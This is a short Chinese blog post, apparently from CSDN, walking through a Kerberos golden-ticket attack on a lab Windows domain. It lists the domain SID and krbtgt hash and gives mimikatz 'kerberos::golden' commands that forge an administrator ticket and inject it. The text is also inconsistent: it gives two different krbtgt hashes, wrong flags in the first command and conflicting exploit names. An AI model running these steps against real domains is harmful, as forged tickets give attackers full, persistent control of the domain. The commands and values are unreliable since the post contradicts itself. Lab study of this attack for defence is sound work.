域渗透之黄金票据大法 本地实验

黄金票据大法

图示:

黄金票据

       ms14068的漏洞原理是伪造域管的tgt,而黄金票据的漏洞原理是伪造krbtgt用户的票据,krbtgt用户是域控中用来管理发放票据的用户,拥有了该用户的权限,就可以伪造系统中的任意用户

黄金票据的条件要求:
1.域名称 hacker.com

2.域的SID 值  S-1-5-21-1854149318-4101476522-1845767379
3.域的KRBTGT账户NTLM密码哈希或者aes-256值

0028977ae726d766b150520dc63df9b4
4.伪造用户名 administrator

第一步:先进入到域普通用户拿到域名称

域名称    hacker

第二步:拿到  krbtgt  用户sid

S-1-5-21-1854149318-4101476522-1845767379

这个就是krbtgt用户的sid  ,后面的是test的 编号

第三步:域的KRBTGT账户NTLM密码哈希或者aes-256值

cf1a2da5f371896f9d70ebd3e90f2bba

这个一定是在之前就拿到了域管的权限才能操作。使用ms16068漏洞拿到域管权限,在找到krbtgt的哈希值。

工具:mimitatz

第四步:伪造用户名 administrator

数据都拿到了,编写命令

kerberos::golden  /admin:administrator  /domain:hacker.com  /sid:S-1-5-21-1854149318-4101476522-1845767379  /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ppt

kerberos::golden  /user:administrator  /domain:hacker.com  /id:502  /sid:S-1-5-21-1854149318-4101476522-1845767379 /krbtgt:cf1a2da5f371896f9d70ebd3e90f2bba  /ptt

第五步:清除klist  

klist purge

第六步:工具mimikatz提权

 

发布了35 篇原创文章 · 获赞 4 · 访问量 4133

猜你喜欢

转载自blog.csdn.net/broing55/article/details/105285508
今日推荐